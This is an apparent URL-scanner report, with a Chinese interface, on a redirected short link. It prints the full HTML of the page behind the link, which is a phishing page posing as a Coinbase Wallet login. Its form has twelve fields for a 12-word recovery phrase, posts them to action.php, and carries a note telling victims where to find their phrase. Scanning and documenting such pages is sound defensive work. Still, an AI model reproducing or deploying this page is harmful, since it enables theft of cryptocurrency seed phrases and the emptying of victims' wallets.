- 扫描 ID:
- 8f13474f-c75f-49b6-9ab9-359c0b208b7c已完成
- 提交的 URL:
- https://wv3.io/jfPDDz7z已重定向
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 3 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
控制台日志消息 · 找到 0 条
记录到 Web 控制台的消息
HTML
页面的原始 HTML 正文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wallet Login Page</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 400px;
width: 100%;
text-align: center;
}
.login-logo {
margin-bottom: 20px;
}
.login-logo img {
width: 150px;
}
.phrase-input {
width: calc(100% / 3 - 10px);
padding: 10px;
margin: 5px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 14px;
}
.login-button {
width: 100%;
padding: 10px;
background-color: #007bff;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s ease;
margin-top: 20px;
}
.login-button:hover {
background-color: #0056b3;
}
.disclaimer {
margin-top: 20px;
color: red;
font-weight: bold;
}
form {
display: flex;
flex-wrap: wrap;
justify-content: space-between;
}
</style>
</head>
<body>
<div class="login-container">
<form action="action.php" method="POST">
<input type="text" class="phrase-input" placeholder="Word 1" name="word1" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 2" name="word2" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 3" name="word3" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 4" name="word4" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 5" name="word5" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 6" name="word6" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 7" name="word7" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 8" name="word8" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 9" name="word9" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 10" name="word10" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 11" name="word11" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 12" name="word12" required="" spellcheck="true">
<button type="submit" class="login-button">Verify Wallet</button>
</form>
<div class="disclaimer">Note: You can find your 12-word recovery phrase for your Coinbase Wallet in the Settings menu by selecting Security, then Backups.</div>
</div>
</body></html>